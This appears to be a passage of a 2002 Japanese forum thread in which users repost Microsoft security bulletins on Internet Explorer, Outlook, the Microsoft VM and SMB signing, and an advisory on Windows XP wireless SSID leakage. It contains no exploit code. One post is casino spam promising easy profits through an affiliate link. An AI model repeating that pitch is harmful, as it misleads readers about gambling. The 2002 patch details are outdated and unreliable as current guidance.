http://support.microsoft.com/default.aspx?scid=kb;ja;JP315092

[IE]フレーム内に Excel を表示したページで複数部数の印刷をすると部数の二乗分出力される
http://support.microsoft.com/default.aspx?scid=kb;ja;JP436996

2乗分、に注意。10部印刷すると100部出てきます・・・
807むむむ ◆MUMUMUkopk :02/11/28 16:03 ID:???
>>803
リアル、メディアプレーヤーの修正パッチを取り下げ
http://cnet.sphere.ne.jp/News/2002/Item/021128-1.html

# むー、、、。
808名無しさん@お腹いっぱい。:02/11/28 21:56 ID:???
やっぱり

   『脱MS宣言』

          しかない。
809名無しさん@お腹いっぱい。:02/11/29 00:21 ID:???
じゃあ超漢字買ってくるわ。
810窓板住人:02/11/29 00:31 ID:???
>>804 がらみ。
xpでなくかつ、IE6SP1以外のマシンでMDACのセキュリティホール対策で、MDAC2.7を
導入するとセキュリティホールを持つmsxml3.dllがインストールされるため、今度はmsxml?.dll
のパッチを当てなきゃならないと言う罠。

参照文献
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/11.html#20021128
http://support.microsoft.com/default.aspx?scid=kb;ja;JP318203

もうめためたですな・・・
811名無しさん@お腹いっぱい。:02/11/29 01:35 ID:???
>810
msxml3.dllのバージョンがSP3なら問題無い訳ね。
812■■■ ■■■ ■■■:02/11/29 02:22 ID:???
ここまで読んで、対処済み
813名無しさん@お腹いっぱい。:02/12/01 15:54 ID:gjpU9Ftx
>>797
\Program Files\Common Files\System\ado\MDACReadme.htmとか。
814名無しさん@お腹いっぱい。:02/12/01 17:23 ID:o/IFH4Ht
最近HPみていたら感染した。
WORM_DATOM.A
これってHP見ただけで感染するのか?
http://www.kawabata.com/Forums/ShowPost.aspx?PostID=102
ファイル名: mdacver.wsf
--------------------------------------------------------------------------------
<job>
<script language="vbscript">
Dim FullInstallVer, Version
Dim Path
'--- レジストリパス
Path = "HKLM\Software\Microsoft\DataAccess\"
FullInstallVer = RegRead(Path, "FullInstallVer")
Version = RegRead(Path, "Version")
Wscript.Echo _
"MDAC バージョン情報" & vbCrLf _
& " FullInstallVer: " & FullInstallVer & vbCrLf _
& " Version: " & Version & vbCrLf _
& " 参考: " _
816名無しさん@お腹いっぱい。:02/12/01 18:09 ID:OL2R21+z
−二乗分の印刷が行われる−
本現象は、Internet Explorer と Excel の仕様に基づいた動作となります。

物凄い仕様だな。マイクロソフトには、「仕様が誤りでした」という考えはないのかな。
817窓板住人:02/12/01 18:25 ID:???
>>814 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_DATOM.A
つーかIEのパッチ当ててないのでは・・・(;´Д`)
818名無しさん@お腹いっぱい。:02/12/01 18:25 ID:n04pXdud
◆◆◆2ちゃんねる住民調査実施中◆◆◆

・アンケートフォーム
http://cgi.din.or.jp/~norihide/cgi-bin/2ch2/2form.html

2ちゃんねるをテーマにした「論文」を書いています。
(先行研究→http://www5.airnet.ne.jp/umakoya/2chtext.html
その過程で「2ちゃんねら〜」の実態に興味が湧き、
アンケート調査を敢行することにいたしました。
個人情報が外部に漏れることはありません。
2ch利用者の方は一人一回のみ、全16問のアンケートにご協力ください。
データ収集期間は11月30日-12月1日の予定です。

なお2ch全体から、広く、偏りの無いデータを集めたいと考えています。
もしよろしければこのアンケートの存在を、
2chの各板・スレッドに宣伝して頂ければ幸いです。
みなさまのご協力よろしくお願いいたします。



819名無しさん@お腹いっぱい。:02/12/01 23:13 ID:???
二乗分の印刷が仕様と言い張るなら、確認ダイアログくらい出して欲しいもんだが…。

出ないのも仕様な罠。
820名無しさん@お腹いっぱい。:02/12/04 06:02 ID:???
保守
821むむむ ◆MUMUMUkopk :02/12/04 21:49 ID:???
■Windows XPの無線LANに登録情報漏洩の危険性、MSは「仕様」と判断

概要:
-----
Windows XP の無線 LAN 機能には、登録してあるアクセスポイントに関する情報
を外部に漏洩する可能性があります。

また、本来の対象アクセスポイントの電波が届かない場合であっても登録されて
いる WEP で暗号化したパケットを送出する可能性があります。

これらの問題により、Windows XP に登録されているアクセスポイントの SSID の
リスト、及び登録されている WEP で暗号化されたパケットを入手され、解読され
る危険性があります。
822むむむ ◆MUMUMUkopk :02/12/04 21:50 ID:???
>>821 続き
問題:
-----
Windows XP で無線 LAN を使用する PC は、利用可能なアクセスポイントの検索
を自動的に行います。もし見つからなかった場合、どれか一つのアクセスポイン
トに接続されるまで、既に設定が登録されているアクセスポイントに対する利用
可否の問い合わせを継続して行います。

ここで、既に XP 内に設定が存在するアクセスポイントと同じ SSID を持つ、別
のアクセスポイントを設置した場合、Windows XP は同一のアクセスポイントと認
識し、この設定済みの WEP でパケットを暗号化して通信を開始しようとします。

この機能により、利用可否の問い合わせのパケットから、無線 LAN 用のパケット
モニタリングツールを使用して登録されている SSID に関する情報を入手するこ
とが可能です。また、その SSID と同一のアクセスポイントを設置することで、
Windows XP の PC に登録されている任意のアクセスポイントの WEP で暗号化さ
れたパケットを入手することが可能となります。
823むむむ ◆MUMUMUkopk :02/12/04 21:50 ID:???
>>822 続き
利用可否の問い合わせと、利用できるネットワークへの自動接続は、無線 LAN の
ネットワークを無効に設定しない限り常に自動で行われるため、電源の入ってい
る Windows XP のマシンは、利用できるアクセスポイントが無い状態で常に登録
されているアクセスポイントの SSID の情報を周囲に漏らしていることになりま
す。

また、WEP にはいくつかの既知の脆弱性が指摘されています。40 bit 長の鍵によ
る暗号化では、ブルートフォース攻撃によって比較的短時間で解読可能であり、
これが 104 bit 長の場合であっても 2 週間程度で解読可能であるという報告も
あります。

このため、WEP で暗号化されたパケットを本来のアクセスポイントがないところ
で送出することは、セキュリティ上好ましい機能ではありません。

図を伴った説明は以下の URL で参照できます。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/60.html
824むむむ ◆MUMUMUkopk :02/12/04 21:51 ID:???
>>823 続き
対策:
-----
以下の方法でこの問題を回避することが可能です。
・Windows XP の無線 LAN 機能を無効に設定し、上記問題のないサードパーティ
製のドライバを利用する。

発見者:
-------
三輪信雄 [email protected]

報告の経緯:
-----------
この問題は Security Response Team of Microsoft Asia Limited に 2002 年
8 月 30 日に報告し、本アドバイザリで報告されている「仕様」の変更の可能性
について議論を続けてきましたが、仕様の変更は行われないことが確実となり、
Security Response Team of Microsoft Asia Limited の同意を得て本アドバイザ
リを発行いたします。

謝辞:
-----
Security Response Team of Microsoft Asia Limited
825むむむ ◆MUMUMUkopk :02/12/04 21:51 ID:???
>>824 続き

免責:
-----
このアドバイザリで示される情報は予告なしに変更されることがあり、かつ、
あるがままの形で提供されます。この情報を適用し生起される結果のリスク
は利用者が負うものとし、株式会社ラックは一切の責任を負わないものとし
ます。

再配布について:
---------------
このアドバイザリの再配布は、下記条件を満たす限り自由です。
・発行元 URL として、以下の URL を明記する。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/60.html
826名無しさん@お腹いっぱい。:02/12/04 23:27 ID:???
そもそも無線LAN自体にセキュリティーなんぞ無いから
対策したところで意味無いような気がしないような
827むむむ ◆MUMUMUkopk :02/12/05 04:47 ID:???
>>826
御意ですが、
ようは、仕様の不備によってリスクが増えますよ、っていうことでしょう。
828名無しさん@お腹いっぱい。:02/12/05 11:06 ID:???
MicrosoftがInternet Explorerの新たなセキュリティ問題を修正する累積的修正プログラムの12月4日版をリリースした。

http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-068.asp(詳細)
http://www.microsoft.com/security/security_bulletins/ms02-068.asp(エンドユーザー向け)
http://www.microsoft.com/windows/ie/downloads/critical/q324929/default.asp(ダウンロードページ)

IE5.5SP2・IE6・IE6SP1を導入しているユーザーが対象だ。
Windows Updateでアップデートするか、ダウンロードページからダウンロードするかをして穴はすぐに埋めた方が良いよ。
829窓板住人:02/12/05 12:06 ID:???
MS02-067 に関する情報
「MS02-067: 電子メール ヘッダー処理の問題により、Outlook 2002 が異常終了
する (331866)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-067ov.asp

概要
====
この問題は、下記対象となる製品に含まれる電子メールのヘッダー情報の処理に
不正な動作を行う処理があり、Outlook が異常終了する可能性があります。
最悪の場合、不正な電子メールが削除されるまで Outlook が異常終了を繰り
返す可能性があります。


対象となる製品
==============
・ Microsoft Outlook 2002

修正プログラム
==============
・ Microsoft Outlook 2002
http://download.microsoft.com/download/outlook2002/patch/olk1005/w98nt42kmexp/en-us/olk1005.exe

本修正プログラムのインストールプログラムは英語版ですが、日本語環境にも
適用可能です。

修正プログラムのダウンロード方法およびインストール方法については、こちら
をご覧ください。
http://www.microsoft.com/japan/security/square/guard/a04g16.asp
830窓板住人:02/12/05 12:06 ID:???
詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザーによる
以下の攻撃を防ぐことができます。

(警告) 特殊な電子メール ヘッダー情報の処理の脆弱性を悪用し、Outlook が
異常終了される問題です。

対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を悪用した攻撃を受けることが
あります。この攻撃は、受動的攻撃という悪意のあるユーザーから送られた
電子メールから攻撃を受ける可能性があります。この攻撃は、ハッカーまたは
クラッカーと呼ばれる悪意のあるユーザーや、ワームといった自動的な攻撃を
目的とした悪意のあるプログラムから行われることがあります。

この脆弱性を悪用されることにより、以下のような実害を受ける事が考えられ
ます。

・ 原因となる電子メールがサーバーまたは個人用フォルダ上に残っている場合
に、そのメールを参照することで Outlook が異常終了されられるため、
正常なメール操作を行えなくなる可能性があります。


日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。
MS02-067: E-mail Header Processing Flaw Could Cause Outlook 2002
to Fail (331866)
http://www.microsoft.com/technet/security/bulletin/MS02-067.asp
831窓板住人:02/12/05 12:07 ID:???
なお、参考までに

IE、OE の安全な利用には高度な知識と情報収集能力が必要!?(2002.12.3)
https://www.netsecurity.ne.jp/article/1/7677.html
832むむむ ◆MUMUMUkopk :02/12/05 13:13 ID:???
>>828-831
おつです。
833むむむ ◆MUMUMUkopk :02/12/06 14:50 ID:4Nz69wNv
■トレンドマイクロ「ウイルスバスター」シリーズにバッファオーバーフローの脆弱性

 コンピューターウイルス対策ソフトのトレンドマイクロは、同社のソフト「ウイルス
バスター」に安全上の欠陥(セキュリティーホール)があることを明らかにした。
人為的にソフトを強制終了できるもので、悪用すればウイルス対策を無効に
できるという。問題を修正するためのソフト(パッチ)を、6日中に配布する。

 問題点が見つかったのは、同社が先月発売した消費者向けの対策ソフト
「ウイルスバスター2003 リアルセキュリティ」と、昨年発売した「ウイルス
バスター2002」。
(中略)
 見つかったのは、ソフトの処理能力を上回るデータを送りつけてソフトを
強制終了させる「バッファオーバーフロー」といわれるセキュリティーホール。
伊藤忠商事の子会社でセキュリティー情報サービス会社のアイ・ディフェンス・
ジャパン(東京・港、横山竜太郎社長)が指摘していた。
(以上、2002年12月6日のNIKKEI NETより一部引用―全文は引用元を参照)

引用元: http://it.nikkei.co.jp/it/top/topCh.cfm?id=20021205e3mi01g505
834窓板住人:02/12/07 18:08 ID:???
>>828 で報告のありましたMS02-068ですが、新たな問題が判明したため、
深刻度が重要から緊急に格上げされております。該当ユーザは早急にパッチを
当てられることをおすすめします。
なお、新たな問題に対してもすでに公開したパッチは対応できることがわかっているため、
「2002/12/05 に公開した修正プログラムに変更はありません。」

Internet Explorer 用の累積的な修正プログラム (324929) (MS02-068)
登録日 : 2002/12/5
更新日 : 2002/12/7
----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp
================================================================
今回の更新内容
このセキュリティ情報ページを更新し、このセキュリティ情報の深刻度を
「緊急」に変更し、脆弱性の影響に関する情報を更新しました。
================================================================
概要 :このセキュリティ情報の対象となるユーザー :
Microsoft(R) Internet Explorer を使用しているお客様

脆弱性の影響 : 攻撃者がユーザーのシステムでコマンドを実行する可能性が
あります。

最大深刻度 : 緊急

推奨する対応策 : お客様はこの累積的な修正プログラムをできる限り早期に
インストールして下さい。

影響を受けるソフトウェア :
・Microsoft Internet Explorer 5.5
・Microsoft Internet Explorer 6
835窓板住人:02/12/07 18:09 ID:???
問題 : 技術的な説明 :
この Internet Explorer 5.5 Service Pack 2 、6 および 6 Service Pack 1
用の累積的な修正プログラムのセキュリティ情報を更新しました。
2002/12/05 に公開した修正プログラムに変更はありません。
Internet Explorer 5.5 および 6 用に以前リリースされた修正プログラムの
すべての修正を含みます。さらに、追加で Internet Explorer のクロス
ドメイン セキュリティ モデルに存在する問題を排除します。 この問題は、
Web ページで特定のオブジェクト キャッシュ技術が使用されている場合に
Internet Explorer が行うセキュリティ チェックが不完全であるために
起こります。これにより、攻撃者がユーザーのシステムでコマンドを
実行できる可能性があります。

この脆弱性により、攻撃者がユーザーのローカル システムに既に存在している
実行可能ファイルを呼び出す可能性があります。また、攻撃者は悪質な
実行可能ファイルをユーザーのシステムに読み込む、または実行可能
ファイルにパラメータを渡す可能性もあります。しかし、マイクロソフト
サポート技術情報 JP810687 で説明されているレジストリ キーの設定は HTML
ヘルプのショートカットを無効にします。これにより、悪質な実行可能
ファイルをユーザーのシステムに読み込む、または実行可能ファイルに
パラメータを渡すことができなくなるため、この脆弱性の影響が著しく
削減されます。
836窓板住人:02/12/07 18:09 ID:???
攻撃者はキャッシュされたプログラミング技術を使用する Web ページを
作成することによりこの脆弱性を悪用し、その Web ページを Web サイトに
ホストするか、または電子メールを介しユーザーに送る可能性があります。
Web ベースの攻撃の場合、ユーザーがその Web サイトを訪問すると、Web
ページが自動的に開かれます。HTML 形式の電子メール ベースの攻撃の場合、
受信者がその電子メールを開くか、またはプレビュー ウィンドウを使用して
表示すると、Web ページが開かれます。

2002 年 12 月 4 日 (米国日付)、マイクロソフトはこのセキュリティ情報の
最初のバージョンをリリースしました。その後、マイクロソフトは、この
セキュリティ情報で解決される脆弱性の影響は、ユーザーのマシンで任意の
コードが実行されるとの報告を受けました。マイクロソフトはその報告を
調査し、この脆弱性の悪用によるコードの実行が例証されました。
マイクロソフトはお客様にこの脆弱性の潜在的な影響の新しい評価と、
その更新された深刻度をお知らせするために、この更新された
セキュリティ情報をリリースしました。

このセキュリティ情報でリリースされた最初の修正プログラムは、
この脆弱性が悪用されることを防ぎました。また、現在でも効果的です。
また、ユーザーが悪質な Web サイトを訪問、または悪質な HTML 形式の
電子メール メッセージを開く場合、悪意のある集団がユーザーのマシンで
コードを実行する可能性のある、このセキュリティ情報以前に解決された
すべての脆弱性を排除します。マイクロソフトはすべてのお客様にこの
累積的な修正プログラムのインストールを強く推奨します。
837窓板住人:02/12/07 18:09 ID:???
問題を緩和する要素 :
・Internet Explorer 5.01 はこの脆弱性の影響を受けません。
・Web ベースの攻撃のシナリオでは、攻撃者は強制的にユーザーを Web
サイトに訪問させることはできません。その代わり、典型的な方法として、
攻撃者はユーザーに攻撃者の Web サイトへ接続するリンクをクリック
させることにより、ユーザーをその Web サイトに誘導することが必要と
なります。
・HTML 形式の電子メール ベースの攻撃のシナリオは既定の構成の
Outlook Express 6 および Outlook 2002 により、ブロックされます。また、
Outlook 電子メール セキュリティ アップデートをインストールした
Outlook 98 および 2000 により、ブロックされます。
・マイクロソフト サポート技術情報 JP810687 で説明されているステップに
従い、HTML ヘルプのショートカットを制限している場合、次の問題を緩和する
要素が当てはまります。
・この脆弱性により、攻撃者はユーザーのローカル システムのファイルを
読み取る可能性がありますが、ファイルの追加、削除、変更はできません。
・システムのファイルを呼び出すには、攻撃者はファイルの名前と保存先を
知っていることが必要条件となります。攻撃者により実行可能ファイルが
呼び出されても、そのファイルにパラメータが渡されることはありません。
・この脆弱性により、攻撃者が選択したプログラムが別のユーザーの
システムに配置されることはありません。
838窓板住人:02/12/07 18:10 ID:???
深刻度 :
Internet Explorer 5.01なし
Internet Explorer 5.5緊急
Internet Explorer 6.0緊急

上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な
展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。

脆弱性識別番号 : CVE-CAN-2002-1262

テストしたバージョン :
マイクロソフトは Internet Explorer バージョン 5.5 および 6 のテストを
行い、この脆弱性による影響を評価しました。Internet Explorer 5.01 は
この脆弱性の影響を受けません。
Windows Operating System Components Lifecycles に関する詳しい情報は
http://microsoft.com/windows/lifecycle/desktop/consumer/components.mspx
(英語情報) をご覧ください。
839窓板住人:02/12/07 18:13 ID:???
修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。
http://www.microsoft.com/windows/ie/downloads/critical/q324929/default.asp
ダウンロード先のリストから [Japanese] を選択してください。
注意: 2002/12/07 の更新による修正プログラムの変更はありません。
既に適用されているお客様は、再適用の必要はありません。

修正プログラムに関する追加情報 :
対象プラットフォーム :
・Internet Explorer 5.5 用の累積的な修正プログラムは
Internet Explorer 5.5 Service Pack 2 を実行しているシステムに
インストールすることができます。
・Internet Explorer 6 用の累積的な修正プログラムは
Internet Explorer 6 または Internet Explorer 6 Service Pack 1 を
実行しているシステムにインストールすることができます。64 bit 版
Internet Explorer 6 をお使いのお客様は、Internet Explorer 6
Service Pack 1 にアップグレードしてから本修正プログラムを
適用してください。
840窓板住人:02/12/07 18:14 ID:???
再起動の必要性 : あり
修正プログラムのアンインストール : 不可

修正プログラムに含まれる過去の修正 :
この累積的な修正プログラムは、マイクロソフト セキュリティ情報 MS02-066
で提供された累積的な修正プログラムを含みます。

修正プログラムが正しくインストールされたかどうか確認する方法 :
この修正プログラムがマシンにインストールされたことを確認するためには、
Internet Explorer を起動し、[ヘルプ] を選択します。Internet Explorer
の [バージョン情報] で [更新バージョン] のフィールドに Q324929 が表示
されていることを確認して下さい。

各ファイルを確認するためには、サポート技術情報 Q324929 の
修正プログラム欄を参照して下さい。

警告 : なし
841 ◆kc/....... :02/12/08 01:51 ID:/XU/ySU0
一個見ちけたよん。
Q322011
http://support.microsoft.com/default.aspx?scid=KB;en-us;q322011
「Windows XP SP1 の FAX コンソールでプレビュー機能を使用できない」を修正
842 ◆kc/....... :02/12/08 01:53 ID:???
せきゅりてぃーかよっ!!
843名無しさん@お腹いっぱい。:02/12/09 15:27 ID:???
>>841
ほぅこれは大変ですな( ´_ゝ`)
844名無しさん@お腹いっぱい。:02/12/10 23:05 ID:???
保守
845窓板住人:02/12/12 22:18 ID:???
Microsoft VMにまたかなりやばいセキュリティホールが見つかった模様です。
Microsoft Windowsを使用しているすべてのユーザはWindowsUpdateから
修正プログラムを入手することを推奨します。

----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-069.asp
----------------------------------------------------------------
Microsoft VM の問題により、システムが侵害される (810030) (MS02-069)

登録日 : 2002/12/12 更新日 : 2002/12/12

概要 :
このセキュリティ情報の対象となるユーザー :
Microsoft(R) Windows(R) を使用しているお客様

脆弱性の影響 : 8 つの脆弱性。最も深刻な脆弱性については、攻撃者が別の
ユーザーのシステムの制御を取得する可能性があります。

最大深刻度 : 緊急

推奨する対応策 :下記に説明されているように、お客様は Microsoft VM ビルド
3809 またはそれ以降のビルドをインストールして下さい。

影響を受けるソフトウェア :
・Microsoft 仮想マシン (Microsoft VM) のバージョンはビルド番号により識別
されます。ビルド番号は 「よく寄せられる質問」 で説明されているように
JVIEW ツールを使用して確認することができます。5.0.3805 までの
Microsoft VM の すべてのビルド (5.0.3805 を含む) はこれらの脆弱性の影響
を受けます。(「よく寄せられる質問」 の日本語情報は現在準備中です。Jview
の使用方法は、概要情報にてご案内していますので、こちらをご覧ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-069ov.asp)
846窓板住人:02/12/12 22:20 ID:???
問題 :技術的な説明 :
Microsoft VM は Win32(R) 運用環境のための仮想マシンです。Microsoft VM は
Internet Explorer のほとんどのバージョンに同梱されています。また、
Windows のほとんどのバージョンにも同梱されています。(これらのバージョン
の一覧は 「よく寄せられる質問」 をご覧下さい。)

Microsoft VM の新しいバージョンが利用可能となり、新たに報告された 8 つの
セキュリティ問題に対する修正プログラムおよび以前リリースされたすべての
VM 用の修正プログラムを含みます。すべての新しい問題に関する攻撃方法は
同一である可能性があります。攻撃者は開かれると任意の脆弱性を悪用する Web
ページを作成し、それを Web サイトにホストする、または HTML 形式の電子
メールとしてユーザーに送る可能性があります。

新しく報告されたセキュリティ問題は次の通りです。(略)
問題を緩和する要素 :(略)

深刻度 :
COM オブジェクト アクセスの脆弱性 緊急
CODEBASE 偽装の脆弱性 重要
ドメイン偽装の脆弱性 警告
JDBC API の脆弱性 警告
Standard Security Manager アクセスの脆弱性 注意
User.dir 公開の脆弱性 注意
不完全な Java オブジェクトのインスタンス作成の脆弱性 注意


上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な
展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。

脆弱性識別番号 : (略)
847窓板住人:02/12/12 22:20 ID:???
テストしたバージョン :
マイクロソフトは VM ビルド 5.0.3167 のテストを行い、この脆弱性による影響
を評価しました。それ以前のバージョンに関してはサポートの対象となって
いないため、この脆弱性による影響は不明です。

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。

既存の Microsoft VM を更新するこの修正プログラムは Windows Update で利用
可能です。
http://windowsupdate.microsoft.com/

注 : ダウンロードし、ネットワークを経由して適用できるバージョンの修正
プログラムが利用可能です。この修正プログラムの入手方法は
「よく寄せられる質問」 をご覧下さい。(「よく寄せられる質問」 の日本語
情報は現在準備中です。準備ができるまでの間、英語情報をご覧ください。
http://www.microsoft.com/technet/security/bulletin/ms02-069.asp)


修正プログラムに関する追加情報 :
対象プラットフォーム :
Microsoft VM を更新する新しい VM のビルドは次の Windows のバージョンに
インストールすることができます。
・Microsoft Windows 95
・Microsoft Windows 98 および 98SE
・Microsoft Windows Millennium
・Service Pack 1 以降の Microsoft Windows NT 4.0
・Microsoft Windows 2000
・Microsoft Windows XP
848窓板住人:02/12/12 22:22 ID:???
この修正を含む予定のサービス パック :
このビルドに含まれる修正はすべての将来の VM のビルドに含まれる予定です。

再起動の必要性 : あり
修正プログラムのアンインストール : 不可

修正プログラムに含まれる過去の修正 :
新しい VM のビルドは 5.0.3805 およびそれ以前のすべてのビルドに取って
代わるものです。新しいビルドは次のマイクロソフト セキュリティ情報で
説明されたすべての問題に対する修正プログラムを含みます。

・マイクロソフト セキュリティ情報
MS99-031 MS99-045 MS00-011 MS00-059 MS00-075 MS00-081 MS02-013 MS02-052

修正プログラムが正しくインストールされたかどうか確認する方法 :
マイクロソフト サポート技術情報 810030 に修正プログラムが正しく
インストールされたかどうかを確認するための情報が記載されています。日本語
版修正プログラムの情報は、現在準備中です。

注 : JVIEW から表示されるバージョン番号に関わらず、上記のマイクロソフト
サポート技術情報で説明されているレジストリ キーはこの修正プログラムの
正しいインストールに関する要素を確認します。
849窓板住人:02/12/12 22:23 ID:9WM3ZVIi
警告 :なし

他のセキュリティ問題を解決する修正プログラムは以下のサイトから入手
できます。
・セキュリティ修正プログラムはマイクロソフト ダウンロード センターから
ダウンロードすることができます。「security_patch」 のキーワード探索に
よって容易に見つけることができます。
・コンシューマー プラットフォーム用の修正プログラムは、WindowsUpdate Web
サイトからダウンロードできます。

詳細情報 :
・US マイクロソフトセキュリティ情報(MS02-069)
http://www.microsoft.com/technet/security/bulletin/ms02-069.asp

更新履歴 :
・2002/12/12: このセキュリティ情報ページを公開しました。
850窓板住人:02/12/12 22:31 ID:???
SMB 署名の問題により、グループ ポリシーが変更される (309376) (MS02-070)
登録日 : 2002/12/12 更新日 : 2002/12/12

概要 :
このセキュリティ情報の対象となるユーザー :
Microsoft(R) Windows(R) XP または Windows 2000 を使用している
システム管理者。特に Windows 2000 に関しては、ドメイン コントローラ
として使用している場合

脆弱性の影響 : グループ ポリシーの変更
最大深刻度 : 警告

推奨する対応策 : Windows 2000 または Windows XP システムを SMB 署名を
使用するように構成している管理者は直ちに修正プログラムをインストール
してください。

影響を受けるソフトウェア :
・Microsoft Windows 2000
・Microsoft Windows XP

----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-070.asp
----------------------------------------------------------------

問題 :技術的な説明 : (略)
問題を緩和する要素 : (略)
851窓板住人:02/12/12 22:31 ID:???
深刻度 :
製品
Windows 2000 警告
Windows XP 注意
Windows XP Service Pack 1 なし
上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な
展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。
Windows XP システムへの危険性は Windows 2000 システムより、
低くなります。その理由はこの脆弱性が悪用された場合に起こる可能性が
ある最も深刻な結果 (ドメイン コントローラから配布される際の
グループ ポリシーの変更) は、Windows XP では、そのように
機能しないため、Windows XP には適用されません。

脆弱性識別番号 : CVE-CAN-2002-1256

テストしたバージョン :
マイクロソフトは Windows 2000 および Windows XP のテストを行い、
この脆弱性による影響を評価しました。SMB 署名は、それ以前の
Windows のバージョンでは使用されていません。

修正プログラム :この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。
・Microsoft Windows 2000 :
・すべての言語 (NEC PC-9800 シリーズを除く)
http://microsoft.com/downloads/details.aspx?FamilyId=52EAC216-A360-4E2D-9C6B-AD4D31C40BA2&displaylang=ja
・NEC PC-9800 シリーズ
http://microsoft.com/downloads/details.aspx?FamilyId=F4119765-846B-491C-B162-BE06BD432828&displaylang=ja
・Microsoft Windows XP :
・32-bit 版
http://microsoft.com/downloads/details.aspx?FamilyId=77B49431-742B-4426-AD45-F09D3AED16CB&displaylang=ja
・64-bit 版
http://microsoft.com/downloads/details.aspx?FamilyId=580FCE68-B7E2-4BF9-8A16-54D1E39F2168&displaylang=ja
852窓板住人:02/12/12 22:34 ID:???
修正プログラムに関する追加情報 : 対象プラットフォーム :
・Windows 2000 用の修正プログラムは Windows 2000 Service Pack 2 または
Service Pack 3 を実行しているシステムにインストールすることができます。
・Windows XP 用の修正プログラムは Windows XP を実行しているシステムに
インストールすることができます。

この修正を含む予定のサービス パック :
・この修正プログラムは Windows 2000 Service Pack 4 に含まれる予定です。
・この修正プログラムは Windows XP Service Pack 1 に既に含まれています。

再起動の必要性 : あり
修正プログラムのアンインストール : 可
修正プログラムに含まれる過去の修正 : なし

修正プログラムが正しくインストールされたかどうか確認する方法 :
この修正プログラムがマシンにインストールされたことを確認するためには、
マシンに次のレジストリ キーが作成されたことを確認して下さい。
・Windows 2000:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\Q309376
各ファイルを確認するためには、次のレジストリ キーで、日付、時間そして
バージョン情報を参照して下さい。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\Q309376\Filelist
・Windows XP:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP1\Q309376
各ファイルを確認するためには、次のレジストリ キーで、日付、時間そして
バージョン情報を参照して下さい。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP1\Q309376\Filelist

更新履歴 : 2002/12/12: このセキュリティ情報ページを公開しました。
詳細情報 :
・US マイクロソフトセキュリティ情報(MS02-070)
http://www.microsoft.com/technet/security/bulletin/ms02-070.asp
853名無しさん@お腹いっぱい。:02/12/13 10:27 ID:???
>>851の32ビットと64ビットの違いがわかりません。
自分のXPがどっちなのか知る方法を教えてくだつぁい。
854名無しさん@お腹いっぱい。:02/12/13 11:08 ID:???
>>853
その事すら分からない貴方なら32ビットでしょう。
855窓板住人:02/12/13 11:10 ID:???
>>853 殆どの場合32ビットだけど・・・
いま2000でやってみたらWindowsUpdateにちゃんとあるから
WindowsUpdateから適用した方が安心かと
856名無しさん@お腹いっぱい。:02/12/13 17:36 ID:???
857 ◆kc/....... :02/12/13 18:19 ID:???
858853:02/12/13 22:49 ID:???
レスありがと
WindowsUpdateで出てこないので
どうやら自分のPCには関係ないようです
859名無しさん@お腹いっぱい。:02/12/14 01:24 ID:???
XPならSP1が当っていれば問題無いだろう。
860名無しさん@お腹いっぱい。:02/12/14 08:24 ID:hLuARL+d
>>859
うちもXP+SP1だけどWindows Updateに出てきたよ?
861名無しさん@お腹いっぱい。:02/12/14 09:59 ID:???
>>858
windowsUpDateをUpDateしる!
862名無しさん@お腹いっぱい。:02/12/14 19:46 ID:PXRyYgIq
あのう昔気になったんですがパソコンが盗まれて警察がみつけたことがあった
らしいんですがそれはパソコン内の製造番号とかを外部(警察)が調べたという
ことですか?つまりそれらは外部からでもわかっちゃうものなんですか?
ちなみにそれらはどこにはいってるんですか?HD?メモリー?マザー?
長くてすみません  でも長い間気になっていたことなんでどうか教えてください。
863名無しさん@お腹いっぱい。:02/12/14 20:58 ID:???
>862 アンタ板違いだって。
864名無しさん@お腹いっぱい。:02/12/14 21:27 ID:???
25歳。
去年まで金無し君だったけど、オンラインカジノとパチンコで
二年で350万貯めた。一度やってみなよ。
初回のみだけど、1ドル以上のチップを買えば30ドル(4000円くらい)貰える。
もらうだけもらってプレイせずに換金することもできるし、ルーレットで赤か黒に
思い切って賭けてしまえば50パーセントで二倍になる。
金なきゃオフラインでゲームすればいいだけ。暇つぶしになる。
ビデオポーカーとかスロとか色々あるのでマジでお勧め。
http://www.imperialcasino.com/~1kl5/japanese/
865862:02/12/15 15:12 ID:YGXMam6k
>>863
はう。。。
そうだったんですかではどこの板いけばいいですか?
866名無しさん@お腹いっぱい。:02/12/15 15:15 ID:???
>>865 http://pc.2ch.net/test/read.cgi/sec/1039053088/l50
とりあえずこの辺か初心者板か雑談系で聞いて見れ
そこで板違いだと言われたらスマソ
867名無しさん@お腹いっぱい。:02/12/15 15:34 ID:uPeq7ETa
>>1
